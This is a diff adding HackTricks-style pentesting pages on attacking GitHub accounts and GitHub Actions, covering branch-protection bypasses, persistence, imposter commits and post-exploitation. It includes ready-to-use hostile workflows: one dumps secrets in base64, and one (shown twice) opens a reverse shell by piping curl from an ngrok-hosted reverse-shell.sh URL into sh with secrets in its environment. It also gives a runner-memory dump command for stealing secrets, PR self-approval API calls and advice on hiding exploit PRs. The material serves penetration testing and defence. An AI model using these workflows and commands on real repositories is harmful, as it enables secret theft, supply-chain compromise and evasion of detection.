+If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\<github\_username>.keys_, you could check this to confirm the private key you found can be used.
+
+**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+
+#### GPG Keys
+
+As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
+
+Check locally if the current user has any key with:
+
+```shell
+gpg --list-secret-keys --keyid-format=long
+```
+
+### With User Token
+
+For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
+
+A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.
+
+A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
+
+### With Oauth Application
+
+For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
+
+An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+
+These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.
+
+Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+
+### With Github Application
+
+For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
+
+An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+
+Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+
+## Compromise & Abuse Github Action
+
+There are several techniques to compromise and abuse a Github Action, check them here:
+
+{% content-ref url="abusing-github-actions/" %}
+[abusing-github-actions](abusing-github-actions/)
+{% endcontent-ref %}
+
+## Branch Protection Bypass
+
+* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
+  * _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
+* **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.
+* **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.
+  * When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**
+* **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.
+* **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections.
+* **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
+* **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
+* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
+  * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
+
+## Bypass Environments Protections
+
+For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
+
+In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).
+
+Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.
+
+```yaml
+  push: # Run it when a push is made to a branch
+    branches:
+      - current_branch_name #Use '**' to run when a push is made to any branch
+```
+
+Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
+
+## Persistence
+
+* Generate **user token**
+* Steal **github tokens** from **secrets**
+  * **Deletion** of workflow **results** and **branches**
+* Give **more permissions to all the org**
+* Create **webhooks** to exfiltrate information
+* Invite **outside collaborators**
+* **Remove** **webhooks** used by the **SIEM**
+* Create/modify **Github Action** with a **backdoor**
+* Find **vulnerable Github Action to command injection** via **secret** value modification
+
+### Imposter Commits - Backdoor via repo commits
+
+In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.
+
+Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
+
+```yaml
+name: example
+on: [push]
+jobs:
+ commit:
+   runs-on: ubuntu-latest
+   steps:
+     - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
+     - shell: bash
+       run: |
+         echo 'hello world!'
+```
+
+For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/pentesting-ci-cd/github-security/abusing-github-actions/README.md
new file mode 100644
index 0000000000..f6d755b44c
--- /dev/null
+++ b/pentesting-ci-cd/github-security/abusing-github-actions/README.md
@@ -0,0 +1,615 @@
+# Abusing Github Actions
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+In this page you will find:
+
+* A **summary of all the impacts** of an attacker managing to access a Github Action
+* Different ways to **get access to an action**:
+  * Having **permissions** to create the action
+  * Abusing **pull request** related triggers
+  * Abusing **other external access** techniques
+  * **Pivoting** from an already compromised repo
+* Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts)
+
+## Impacts Summary
+
+For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions).
+
+If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to:
+
+* **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP.
+* **Compromise deployments** and other **artifacts**.
+  * If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
+* **Execute code in custom workers** to abuse computing power and pivot to other systems.
+* **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`.
+
+## GITHUB\_TOKEN
+
+This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option:
+
+<figure><img src="../../../.gitbook/assets/image (86).png" alt=""><figcaption></figcaption></figure>
+
+This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
+
+{% hint style="warning" %}
+Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`.
+{% endhint %}
+
+You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github\_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
+
+Note that the token **expires after the job has completed**.\
+These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
+
+Some interesting things you can do with this token:
+
+{% tabs %}
+{% tab title="Merge PR" %}
+```bash
+# Merge PR
+curl -X PUT \
+    https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/merge \
+    -H "Accept: application/vnd.github.v3+json" \
+    --header "authorization: Bearer $GITHUB_TOKEN" \
+    --header 'content-type: application/json' \
+    -d '{"commit_title":"commit_title"}'
+```
+{% endtab %}
+
+{% tab title="Approve PR" %}
+```bash
+# Approve a PR
+curl -X POST \
+    https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
+    -H "Accept: application/vnd.github.v3+json" \
+    --header "authorization: Bearer $GITHUB_TOKEN" \
+    --header 'content-type: application/json' \
+    -d '{"event":"APPROVE"}'
+```
+{% endtab %}
+
+{% tab title="Create PR" %}
+```bash
+# Create a PR
+curl -X POST \
+  -H "Accept: application/vnd.github.v3+json" \
+  --header "authorization: Bearer $GITHUB_TOKEN" \
+    --header 'content-type: application/json' \
+  https://api.github.com/repos/<org_name>/<repo_name>/pulls \
+  -d '{"head":"<branch_name>","base":"master", "title":"title"}'
+```
+{% endtab %}
+{% endtabs %}
+
+{% hint style="danger" %}
+Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
+{% endhint %}
+
+<details>
+
+<summary>List secrets in Github Action output</summary>
+
+```yaml
+name: list_env
+on:
+  workflow_dispatch: # Launch manually
+  pull_request: #Run it when a PR is created to a branch
+    branches:
+      - '**'
+  push: # Run it when a push is made to a branch
+    branches:
+      - '**'
+jobs:     
+  List_env:
+    runs-on: ubuntu-latest
+    steps:
+      - name: List Env
+        # Need to base64 encode or github will change the secret value for "***"
+        run: sh -c 'env | grep "secret_" | base64 -w0'
+        env:
+          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+```
+
+</details>
+
+<details>
+
+<summary>Get reverse shell with secrets</summary>
+
+```yaml
+name: revshell
+on:
+  workflow_dispatch: # Launch manually
+  pull_request: #Run it when a PR is created to a branch
+    branches:
+      - '**'
+  push: # Run it when a push is made to a branch
+    branches:
+      - '**'
+jobs:     
+  create_pull_request:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Get Rev Shell
+        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+        env:
+          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+```
+
+</details>
+
+It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions:
+
+<figure><img src="../../../.gitbook/assets/image (286).png" alt="" width="269"><figcaption></figcaption></figure>
+
+## Allowed Execution
+
+{% hint style="info" %}
+This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**.
+
+If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
+{% endhint %}
+
+### Execution from Repo Creation
+
+In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
+
+### Execution from a New Branch
+
+If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called).
+
+You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be):
+
+```yaml
+on:
+  workflow_dispatch: # Launch manually
+  pull_request: #Run it when a PR is created to a branch
+    branches:
+      - master
+  push: # Run it when a push is made to a branch
+    branches:
+      - current_branch_name
+
+# Use '**' instead of a branh name to trigger the action in all the cranches
+```
+
+***
+
+## Forked Execution
+
+{% hint style="info" %}
+There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them.
+{% endhint %}
+
+### `pull_request`
+
+The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow:
+
+<figure><img src="../../../.gitbook/assets/image (184).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="info" %}
+As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**.
+
+**I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~
+{% endhint %}
+
+Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
+
+> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**.
+
+An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations.
+
+{% hint style="danger" %}
+**Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!**
+{% endhint %}
+
+As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**.
+
+### **`pull_request_target`**
+
+The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission).
+
+Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
+Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
+
+It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**.
+
+An this one will have **access to secrets**.
+
+### `workflow_run`
+
+The [**workflow\_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`.
+
+In this example, a workflow is configured to run after the separate "Run Tests" workflow completes:
+
+```yaml
+on:
+  workflow_run:
+    workflows: [Run Tests]
+    types:
+      - completed
+```
+
+Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
+
+This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
+The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**.
+
+### `workflow_call`
+
+TODO
+
+TODO: Check if when executed from a pull\_request the used/downloaded code if the one from the origin or from the forked PR
+
+## Abusing Forked Execution
+
+We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused:
+
+### Untrusted checkout execution
+
+In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request).
+
+In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**.
+
+{% hint style="danger" %}
+However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded):
+{% endhint %}
+
+<pre class="language-yaml"><code class="lang-yaml"># INSECURE. Provided as an example only.
+on:
+  pull_request_target
+
+jobs:
+  build:
+    name: Build and test
+    runs-on: ubuntu-latest
+    steps:
+<strong>    - uses: actions/checkout@v2
+</strong><strong>      with:
+</strong><strong>        ref: ${{ github.event.pull_request.head.sha }}
+</strong>
+    - uses: actions/setup-node@v1
+    - run: |
+        npm install
+        npm build
+
+    - uses: completely/fakeaction@v2
+      with:
+        arg1: ${{ secrets.supersecret }}
+
+    - uses: fakerepo/comment-on-pr@v1
+      with:
+        message: |
+          Thank you!
+</code></pre>
+
+The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
+
+{% hint style="warning" %}
+A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
+{% endhint %}
+
+### Context Script Injections <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
+
+Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
+
+{% content-ref url="gh-actions-context-script-injections.md" %}
+[gh-actions-context-script-injections.md](gh-actions-context-script-injections.md)
+{% endcontent-ref %}
+
+### **GITHUB\_ENV Script Injection** <a href="#what-is-usdgithub_env" id="what-is-usdgithub_env"></a>
+
+From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
+
+If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD\_PRELOAD** or **NODE\_OPTIONS**.
+
+For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
+
+<figure><img src="../../../.gitbook/assets/image (261).png" alt=""><figcaption></figcaption></figure>
+
+### Vulnerable Third Party Github Actions
+
+#### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact)
+
+As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories.
+
+The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
+
+Example of vulnerable workflow:
+
+```yaml
+on:
+    workflow_run:
+        workflows: ["some workflow"]
+        types:
+            - completed
+            
+jobs:
+    success:
+        runs-on: ubuntu-latest
+        steps:
+            - uses: actions/checkout@v2
+            - name: download artifact
+              uses: dawidd6/action-download-artifact
+              with:
+                workflow: ${{ github.event.workflow_run.workflow_id }}
+                name: artifact
+            - run: python ./script.py
+              with:
+                  name: artifact
+                  path: ./script.py
+```
+
+This could be attacked with this workflow:
+
+```yaml
+name: "some workflow"
+on: pull_request
+
+jobs:
+    upload:
+        runs-on: ubuntu-latest
+        steps:
+            - run: echo "print('exploited')" > ./script.py
+            - uses actions/upload-artifact@v2
+              with:
+                name: artifact
+                path: ./script.py
+```
+
+***
+
+## Other External Access
+
+### Deleted Namespace Repo Hijacking
+
+If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
+
+{% hint style="danger" %}
+So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
+{% endhint %}
+
+If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
+
+***
+
+## Repo Pivoting
+
+{% hint style="info" %}
+In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
+{% endhint %}
+
+### Cache Poisoning
+
+A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
+
+{% content-ref url="gh-actions-cache-poisoning.md" %}
+[gh-actions-cache-poisoning.md](gh-actions-cache-poisoning.md)
+{% endcontent-ref %}
+
+### Artifact Poisoning
+
+Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**:
+
+{% content-ref url="gh-actions-artifact-poisoning.md" %}
+[gh-actions-artifact-poisoning.md](gh-actions-artifact-poisoning.md)
+{% endcontent-ref %}
+
+***
+
+## Post Exploitation from an Action
+
+### Accessing AWS and GCP via OIDC
+
+Check the following pages:
+
+{% content-ref url="../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md" %}
+[aws-federation-abuse.md](../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md)
+{% endcontent-ref %}
+
+{% content-ref url="../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md" %}
+[gcp-federation-abuse.md](../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md)
+{% endcontent-ref %}
+
+### Accessing secrets <a href="#accessing-secrets" id="accessing-secrets"></a>
+
+If you are injecting content into a script it's interesting to know how you can access secrets:
+
+* If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
+
+<details>
+
+<summary>List secrets in Github Action output</summary>
+
+```yaml
+name: list_env
+on:
+  workflow_dispatch: # Launch manually
+  pull_request: #Run it when a PR is created to a branch
+    branches:
+      - '**'
+  push: # Run it when a push is made to a branch
+    branches:
+      - '**'
+jobs:     
+  List_env:
+    runs-on: ubuntu-latest
+    steps:
+      - name: List Env
+        # Need to base64 encode or github will change the secret value for "***"
+        run: sh -c 'env | grep "secret_" | base64 -w0'
+        env:
+          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+
+                    secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+```
+
+</details>
+
+<details>
+
+<summary>Get reverse shell with secrets</summary>
+
+```yaml
+name: revshell
+on:
+  workflow_dispatch: # Launch manually
+  pull_request: #Run it when a PR is created to a branch
+    branches:
+      - '**'
+  push: # Run it when a push is made to a branch
+    branches:
+      - '**'
+jobs:     
+  create_pull_request:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Get Rev Shell
+        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+        env:
+          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+```
+
+</details>
+
+* If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
+  * ```bash
+    cat /home/runner/work/_temp/*
+    ```
+* For a JavaScript actions the secrets and sent through environment variables
+  * ```bash
+    ps axe | grep node
+    ```
+*   For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
+
+    ```yaml
+    uses: fakeaction/publish@v3
+    with:
+        key: ${{ secrets.PUBLISH_KEY }}
+    ```
+
+### Abusing Self-hosted runners
+
+The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml.
+
+**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one.
+
+In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory:
+
+{% code overflow="wrap" %}
+```bash
+sudo apt-get install -y gdb
+sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
+```
+{% endcode %}
+
+Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
+
+### Github Docker Images Registry
+
+It's possible to make Github actions that will **build and store a Docker image inside Github**.\
+An example can be find in the following expandable:
+
+<details>
+
+<summary>Github Action Build &#x26; Push Docker Image</summary>
+
+```yaml
+[...]
+
+- name: Set up Docker Buildx
+  uses: docker/setup-buildx-action@v1
+
+- name: Login to GitHub Container Registry
+  uses: docker/login-action@v1
+  with:
+    registry: ghcr.io
+    username: ${{ github.repository_owner }}
+    password: ${{ secrets.ACTIONS_TOKEN }}
+
+- name: Add Github Token to Dockerfile to be able to download code
+  run: |
+    sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
+
+- name: Build and push
+  uses: docker/build-push-action@v2
+    with:
+      context: .
+      push: true
+      tags: |
+        ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
+        ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
+
+[...]
+```
+
+</details>
+
+As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**.
+
+A user with read permissions over the repo will then be able to download the Docker Image using a personal access token:
+
+```bash
+echo $gh_token | docker login ghcr.io -u <username> --password-stdin
+docker pull ghcr.io/<org-name>/<repo_name>:<tag>
+```
+
+Then, the user could search for **leaked secrets in the Docker image layers:**
+
+{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics" %}
+
+### Sensitive info in Github Actions logs
+
+Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
+
+## Covering your Tracks
+
+(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **can’t delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR)
+
+An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github.
+
+{% hint style="warning" %}
+The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
+{% endhint %}
+
+## Tools
+
+The following tools are useful to find Github Action workflows and even find vulnerable ones:
+
+* [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
+* [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
+* [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X)
+* [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
